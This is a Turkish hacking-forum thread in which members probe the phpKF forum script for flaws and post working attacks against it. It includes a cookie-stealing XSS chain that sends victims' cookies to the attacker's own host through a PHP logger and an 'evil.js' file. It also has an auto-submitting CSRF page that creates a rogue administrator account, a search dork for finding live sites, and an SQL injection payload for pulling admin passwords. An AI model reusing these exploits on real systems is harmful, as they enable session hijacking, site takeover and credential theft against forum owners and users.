Bug Busters Avlanıyor (herkes konuya) (1 Viewer)

Mectruy 

Not Gonna Get Us
Joined
Dec 1, 2015
Credits
201,695
Rating - 94.7%
Forumda bayadır bir etkinlik yapmadık, son zamanlarda gerçekten hack odaklı bir etkileşim olmadı. Bugün ne yapacağız ? aşağıda vermiş olduğum url aslında bir türk yapımı Forum scripti, eskiden beri bilinen ancak fazla popüler olmayan bir script diyelim, bizler bu scriptte bulduğumuz açıkları, sistem hatalarını, ufakda olsa erişim izni olmayan kısımlarını değiştirilip değişitirilemediğini inceleyelim

Bulduğunuz hertürlü girişimi screenler ile konuya ekleyip yayınlayın.


Scripti indirme linki: https://www.phpkf.com/dosya.php?no=936

Bu kendinize bir meydan okuma olsun.

Ben ne yapabilirimki ? demeyin , deneyin.




not: scripti henüz ben bile indirmedim yani bir açık varmı yokmu gerçekten bilmiyorum hep birlikte göreceğiz böylece.
 
Last edited:

meftun

buraya nasıl yazılıyor mk
Joined
Apr 11, 2019
Credits
0
Rating - 0%
cevap yazan çıkmaz gibi çıksa da belirli kişiler çıkar bekliyorum ben de nasıl açıklar bulunacak diye
 

Mectruy 

Not Gonna Get Us
Joined
Dec 1, 2015
Credits
201,695
Rating - 94.7%
Profil kısmına gelip cinsiyet bölümünde kaynak görüntüledim ve value değerlerini bir kontrol etmek istedim, ne nereye atanmış diye. İşin ilginç kısmı sitede icq ile alakalı bir alan olmamasına rağmen 0 , 1 , 2 value dışında herhangi farklı bir rakam girildiğinde sanki icq bölümünü güncellemeye çalışıyormuşuz gibi çıktı alıyoruz. çee

Şimdi bu minik bug'un anlamı nedir acaba ? scriptte hala kodların içinde eski value değerleri silinmemiş, görsel olarak bunu silselerde kodlardan silmemişler , bu nedemek oluyor ? acaba daha ne gibi eski kodlar mevcut bu script içinde ? baştan düzenlemek yerine bir nevi halı altına boca edilmiş gibi bir durum var.

1.png

Burda ICQ bilgisinin 30 karakterden uzun olamıyacağı şeklinde hata verdi (düzenledikten sonra) tabiki alakasız bir hata mesajıydı.

2.png


Arkadaşlar bu şekilde ufak tefek ne varsa dökün , hackleyin diyen yok.
 
B

blackdewil

çok fazla incelemedim can sıkıntısına 5 dk baktım. çoğu sayfada csrftoken kontrolü yok az biraz kasılırsa stored xss + csrf ile admin ekletmeye kadar gider. şimdilik bir tane self & stored tam kontrol etmediğim bir xss atayım belki devam ettiren kardeş çıkar

üyelik düzenleme sayfası payload klasik
87f45db571d.png



bum

a6a31f8aae8.png


edit: az önce kontrol ettim storedmiş. sahurdan sonra snifferini yazarım admin cookiesi araklar takılırsınız
 
B

blackdewil

şöyle de garip bir csrf var.


Code:
<form action = "http://localhost/phpkf-cms/phpkf-kurulum/guncelle.php" method = "POST">
<input type = "hidden" name = "kurulum_yapildi" value = "ayar_dosyasi">
<input type = "hidden" name = "ayar_bilgi" value = "<?=phpinfo();?>">
<input type = "submit" value = "git">
</form>
<span>b4style</span>

30442c329ad.png


hatalı yazılan kod satırı ;

phpkf-yonetim/guncelle.php satır 29;

Code:
if ( (isset($_POST['kurulum_yapildi'])) AND (isset($_POST['ayar_bilgi'])) AND ($_POST['kurulum_yapildi'] == 'ayar_dosyasi') )



ayar_bilgi icerisine yazdirdiginiz deger phpkf-ayar.php diye dosya olusturulup size download ettiriliyor. çeşitli şeyler için kullanılır
 

Mectruy 

Not Gonna Get Us
Joined
Dec 1, 2015
Credits
201,695
Rating - 94.7%
ex1.png ex2.png

Bu araada arkadaşlar benim bulduğum yeni bir xss çıktı.

dosyamız: oi_yaz.php?kip=1&uye_ara=>">">"><XSS>


browser üzerinden doğrudan çalıştırıldığı için daha pratik şekilde cookies , session ne varsa toplama tehlikesi ortaya çıktı. Kullandığım browser Microsoft Edge.


Konuyu takipte kalın, bu tür xss açıklarının sebeb olabileceği tehlikeyi adım adım izleyebilirsiniz.

not: resmi sitesi üzerinden denemeyin boşuna nginx engelliyor nefes bile aldırmaz çee
 
Last edited:
B

blackdewil

View attachment 1338 View attachment 1339

Bu araada arkadaşlar benim bulduğum yeni bir xss çıktı.

dosyamız: oi_yaz.php?kip=1&uye_ara=>">">"><XSS>


browser üzerinden doğrudan çalıştırıldığı için daha pratik şekilde cookies , session ne varsa toplama tehlikesi ortaya çıktı. Kullandığım browser Microsoft Edge.


Konuyu takipte kalın, bu tür xss açıklarının sebeb olabileceği tehlikeyi adım adım izleyebilirsiniz.

not: resmi sitesi üzerinden denemeyin boşuna nginx engelliyor nefes bile aldırmaz çee
cookieler httponly değil edge üzerinden explemene gerek yok chrome veya mozilla üzerinden xss_filter geçersen de kullanici_kimlik cookiesini alirsin sonrasi zaten session hijacking :D
 
B

blackdewil

View attachment 1338 View attachment 1339

Bu araada arkadaşlar benim bulduğum yeni bir xss çıktı.

dosyamız: oi_yaz.php?kip=1&uye_ara=>">">"><XSS>


browser üzerinden doğrudan çalıştırıldığı için daha pratik şekilde cookies , session ne varsa toplama tehlikesi ortaya çıktı. Kullandığım browser Microsoft Edge.


Konuyu takipte kalın, bu tür xss açıklarının sebeb olabileceği tehlikeyi adım adım izleyebilirsiniz.

not: resmi sitesi üzerinden denemeyin boşuna nginx engelliyor nefes bile aldırmaz çee


bunu ve benim paylaştığım xss'i exploit edemeyenler içün;
bi gd.php açın uzak sunucunuzda içinde bunlar olsun;

eb.php

Code:
<?php
file_put_contents("cookie.txt", $_GET['k']);
?>

ardından yine uzak hostunuzda evil.js oluşturun ve içine şunları yazın
Code:
i=new/**/Image();
i.src=%27http://HOSTUNUZ/eb.php?k=%27%2Bdocument.cookie%3C/script%3E

ardından xssli siteye <script src = "http://hostunuz/evil.js"></script> seklinde gomun kurbana sallayin cookieleri gelsin.
 
B

blackdewil

hatta daha tryhard kasmak isteyen varsa ve hedefte cross domaine müsade ediliyorsa iframe ile xssli urlyi sitesine gömsün ziyaret eden otomatik sniff yer.
 

Mectruy 

Not Gonna Get Us
Joined
Dec 1, 2015
Credits
201,695
Rating - 94.7%
Admin panelde yeni bir bug daha çıktı ve CSRF 'de hazır çee tek yapmanız gereken aşağıdaki kodların yüklü olduğu bir html sayfaya admin sitedeyken tıklattırmak çee ardından sitede 2. bir yönetici hesabı oluşur.

Örnek saldırı urlsi: https://expw0rm.com/ex.html <<- csrf kodlarımız

oluşan admin bilgileri, isterseniz değişebilirsinizde.
nick: Yaslikurt
şifre: 1122333


Dork: Yazılım: phpKF © 2007-2019
Bu scripti kullanan forumlar var gerisi size kalmış.

CSRF içinde değişmeniz gereken kısım Hedef site kısmıdır, default olarak gelen expw0rm.com kısmını hedef site olarak değişmeyi unutmayın. Ayrıca forum hangi dizine kuruluysa o kısmıda ona göre ayarlayın.

Değişmesi gereken Örnek url: http://expw0rm.com/forum/yonetim/yeni_uye.php

HTML:
<form action="http://expw0rm.com/forum/yonetim/yeni_uye.php" method="post" onsubmit="return denetle()" name="form1">
<input type="hidden" name="kayit_yapildi_mi" value="form_dolu">


<table cellspacing="1" width="500" cellpadding="5" border="0" align="center" bgcolor="#dddddd">
    <tbody><tr class="tablo_ici">
    <td colspan="2" class="liste-veri" align="left" valign="bottom">
<font size="1">

</font>
</font>
    </td>
    </tr>

    <tr class="liste-etiket">
    <td align="left" width="40%" height="40" class="tablo_ici">Kullanıcı Adı:</td>

    <td align="left" width="60%" height="40" class="tablo_ici">
<input type="text" placeholder="Kullanıcı Adı" name="kullanici_adi" id="kullanici_adi" class="formlar giris-text" maxlength="20" value="Yaslikurt" style="width: 220px; background-image: url(&quot;temalar/varsayilan/resimler/dogru.png&quot;);" onkeyup="javascript:dogrula_giris(this.id)" onblur="KAdi()" required="">
<div style="padding-top:5px; height:18px; font-size:9px; color:#ff0000" id="kullanici_adi-alan2">Bu kullanıcı adı kullanılmaktadır.</div>
    </td>
    </tr>


    <tr class="liste-etiket">
    <td align="left" height="40" class="tablo_ici">E-Posta Adresi:</td>

    <td align="left" height="40" class="tablo_ici">
<input type="email" placeholder="E-Posta Adresi" name="posta" id="posta" class="formlar giris-text" maxlength="70" value="[email protected]" style="width: 220px; background-image: url(&quot;temalar/varsayilan/resimler/yanlis.png&quot;);" onkeyup="javascript:dogrula_giris(this.id)" required="">
<br><label style="cursor: pointer;"><input type="checkbox" name="eposta_gizle">
<font style="font-size: 11px; font-weight: normal; font-style: italic;">E-Posta adresini gizle</font></label>
    </td>
    </tr>


    <tr class="liste-etiket">
    <td align="left" height="40" class="tablo_ici">Şifre:</td>

    <td align="left" height="40" class="tablo_ici">
<input type="password" placeholder="Şifre" name="sifre" id="sifre" class="formlar giris-text" maxlength="20" value="1122333" style="width: 220px; background-image: url(&quot;temalar/varsayilan/resimler/dogru.png&quot;);" onkeyup="javascript:dogrula_giris(this.id)" required="">
    </td>
    </tr>


    <tr class="liste-etiket">
    <td align="left" height="40" class="tablo_ici">Şifre Onay:</td>

    <td align="left" height="40" class="tablo_ici">
<input type="password" placeholder="Şifre Tekrar" name="sifre2" id="sifre2" class="formlar giris-text" maxlength="20" value="1122333" style="width: 220px; background-image: url(&quot;temalar/varsayilan/resimler/dogru.png&quot;);" onkeyup="javascript:dogrula_giris(this.id)" required="">
    </td>
    </tr>


    <tr class="liste-etiket">
    <td align="left" height="40" class="tablo_ici">Yetkisi:</td>

    <td align="left" height="40" class="tablo_ici">
<select class="formlar" name="yetki" required="">
<option value="1" selected="selected">Yönetici</option>

</select>
    </td>
    </tr>


    <tr class="liste-etiket">
    <td align="center" valign="middle" height="50" colspan="2" class="tablo_ici">
<input class="dugme" type="submit" value="Üye Oluştur">
 &nbsp; &nbsp;
<input class="dugme" type="reset" value="Temizle">
    </td>
    </tr>

</tbody>
</tbody></table>
</form>
<script> document.forms[0].submit() </script>
 
Last edited:
B

blackdewil

çok fazla incelemedim can sıkıntısına 5 dk baktım. çoğu sayfada csrftoken kontrolü yok az biraz kasılırsa stored xss + csrf ile admin ekletmeye kadar gider. şimdilik bir tane self & stored tam kontrol etmediğim bir xss atayım belki devam ettiren kardeş çıkar

@Mectruy :)
 
B

blackdewil

phpkf-yonetim/phpkf-bilesenler/guvenlik.php
satır 69;
Code:
    $vtsorgu = "SELECT id,yonetim_kimlik,kullanici_kimlik,yetki,son_hareket,kul_ip FROM $tablo_kullanicilar WHERE yonetim_kimlik='$_COOKIE[yonetim_kimlik]' AND kullanici_kimlik='$_COOKIE[kullanici_kimlik]' LIMIT 1";

cookieleri zkTemizle diye bir fonksiyona sokuyor ve sonra direk sql sorgusuna daldırıyor. o fonksiyon da şu

Code:
function zkTemizle($metin)
{
    global $vt;

    $donen = $metin;
    $donen = @urldecode($donen);
    $donen = @$vt->real_escape_string($donen);

    $bul = array('>', '<');
    $cevir = array('&gt;', '&lt;');
    $donen = @str_replace($bul, $cevir, $donen);

    return $donen;
}

mysql_real_escape_string yıllardır bypass edilebilen kolay bi fonksiyon. burada da yüzde doksan sql injection var. yoruldum yatıp dinlenicem azimli bir arkadaş kurcalar bişeyler çıkarır belki.

%bf%27 UNION SELECT sifre FROM phpkfcms_kullanicilar WHERE id='1

tarzı bi sorgu ile patates edebilirsiniz
 
Joined
Dec 25, 2018
Credits
0
Rating - 0%
1 saattir deniyorum bir şey bulamadım. :/

admin sayfasından xss çıkıyor ama...
normalde xss htmlpurifier bypass etmeyi bilsem bir şeyler çıkacak da.
 
Last edited:

LETRX

Abracadabra
Joined
May 8, 2019
Credits
32
Rating - 0%
" csrftoken kontrolü yok az biraz kasılırsa stored xss + csrf ile admin ekletmeye kadar gider "

İleri görüşlü olmak güzeldir b4 çee devam cılkı çıktı scriptin şimdiden , sahibi görmese iyidir konuyu çee
bir tane sitede csrf token açığı buldum bunu nasıl kullanabilirim ?
 

Users who are viewing this thread

Top